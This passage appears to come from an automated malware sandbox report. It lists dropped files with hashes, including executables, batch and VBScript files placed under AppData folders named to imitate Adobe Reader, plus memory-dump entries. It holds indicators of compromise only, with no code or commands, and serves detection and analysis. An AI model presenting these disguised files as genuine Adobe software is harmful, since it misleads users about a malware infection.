2dcb3b58de4e71a1febd32f789d5fb36de11cadd

SHA256
09813ea33c87d6d2a4dec3c294c7c0a28a223b138f8fecb40450d696d8a3fced

SHA512
f54f35d5ed2a2d97a932f7713d80b754233fdc2f343cf79460f1fd3c23363fa418dcc0250ac6826df3dc5754dda0a5ad05c8705603392d2e0ecebb7b2904cbef

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq

Filesize
119B

MD5
7e3ac90901e9c805b04ae5517a642547

SHA1
b196397ef641ab1b37d3478abed7523ba703de17

SHA256
69b2ff2f6434f34617b71fd775f0c67e21798d7e71705f2f5e9d839016c3072a

SHA512
d76e4baa26b7984c97ad53f904bfcd19600ff90d4e28aa9120bfafefd13abf147f0afce3edd6a0ee3a58d7d8c4b89943ff851cdc1ba56e7de3899defcf7bde6f

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe

Filesize
124KB

MD5
1a1075e5e307f3a4b8527110a51ce827

SHA1
f453838ed21020b7ca059244feea8579e5aa74ef

SHA256
ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5

SHA512
b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat

Filesize
556B

MD5
97410477dc9501dffca4ea4b1ae57273

SHA1
fb573b3bf4eba734b0f32db1a5b7ff78de36b064

SHA256
3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c

SHA512
3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs

Filesize
186B

MD5
09082253605a7171f078e26dc308a667

SHA1
585286c9fcda5e66e7fdb4e17a7bab6160183d46

SHA256
f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

SHA512
adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs

Filesize
189B

MD5
ce8041824149d8266dbb0ad9688224d7

SHA1
3ab653c43ce66681ceaab90193e1a4c95d998090

SHA256
0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

SHA512
e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe

Filesize
256KB

MD5
97b8dbcc7b3cc290aef4241df911ac2e

SHA1
733ababbcd278821d4e3ee78580841981f26642e

SHA256
c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

SHA512
4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat

Filesize
139B

MD5
89412aba215b6cd18b8a64c4485fa03f

SHA1
37089346499f54a7d89262a67d95c8764ab3ca1f

SHA256
9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1

SHA512
7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe

Filesize
2.1MB

MD5
3351585db91521d6fa543490ac7cd6a5

SHA1
9be2b3abf17613d7386f9949cabaedd466902e82

SHA256
3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4

SHA512
804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe

Filesize
2.1MB

MD5
75a35514185cd2c5cf5aab50cc380963

SHA1
f1ff1e088f910398a48f4f7dfddec24e6d6d1734

SHA256
1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937

SHA512
ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat

Filesize
1KB

MD5
ce7ccd3b48dbe8f34db3b2b1222e4fd9

SHA1
e25f9947c2b250c98dffd7bfeaca75b4db17dcfd

SHA256
6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e

SHA512
ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011

Filesize
1KB

MD5
5de85a4701d0499c44ea2329a9702584

SHA1
3481943eb0620234bab8abc19e828d6b6cad5376

SHA256
75ecaa7e9ffa3088f19b443f764a28f754c6482a95698a6f3445404ef6dd0272

SHA512
f1ba3caa447a18611d24bd62e0b8d97e78364a5802a3795f775929bcfc53a3b9250d16d4a5f4c47ebc7c435f6ea8625bad601a5007f3be1f1ea36b3a866eb837

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112

Filesize
400B

MD5
3c305699054489d4ba953729549294b8

SHA1
272b920622013b83dc073c26b75f5968663496c5

SHA256
52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8

SHA512
7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b

Download Submit
memory/1160-123-0x0000000002660000-0x0000000002914000-memory.dmp

Filesize
2.7MB

Download
memory/1160-124-0x0000000002660000-0x0000000002914000-memory.dmp

Filesize
2.7MB

Download
memory/1160-165-0x0000000002660000-0x0000000002917000-memory.dmp

Filesize
2.7MB

Download
memory/1160-204-0x0000000002660000-0x0000000002917000-memory.dmp

Filesize
2.7MB

Download
memory/1160-163-0x0000000002660000-0x0000000002917000-memory.dmp

Filesize
2.7MB

Download
memory/2116-158-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2116-126-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2228-134-0x0000000002740000-0x000000000294C000-memory.dmp

Filesize
2.0MB

Download
memory/2228-148-0x0000000002740000-0x000000000294C000-memory.dmp

Filesize
2.0MB

Download
memory/2228-154-0x0000000002740000-0x000000000294C000-memory.dmp

Filesize
2.0MB

Download
memory/2228-143-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2228-145-0x0000000002740000-0x000000000294C000-memory.dmp

Filesize
2.0MB

Download
memory/2228-144-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2228-142-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2228-141-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2228-130-0x0000000002740000-0x000000000294C000-memory.dmp

Filesize
2.0MB

Download
memory/2228-129-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2432-183-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2432-186-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2432-169-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2432-194-0x0000000002670000-0x000000000287C000-memory.dmp

Filesize
2.0MB

Download
memory/2432-184-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2432-170-0x0000000002670000-0x000000000287C000-memory.dmp

Filesize
2.0MB

Download
memory/2432-187-0x0000000002670000-0x000000000287C000-memory.dmp

Filesize
2.0MB

Download
memory/2432-174-0x0000000002670000-0x000000000287C000-memory.dmp

Filesize
2.0MB

Download
memory/2432-185-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2432-190-0x0000000002670000-0x000000000287C000-memory.dmp

Filesize
2.0MB

Download
memory/2592-167-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2592-168-0x00000000024D0000-0x0000000002787000-memory.dmp

Filesize
2.7MB

Download
memory/2592-197-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2696-74-0x0000000000110000-0x0000000000112000-memory.dmp

Filesize
8KB

Download
memory/2752-73-0x0000000000360000-0x0000000000362000-memory.dmp

Filesize
8KB

Download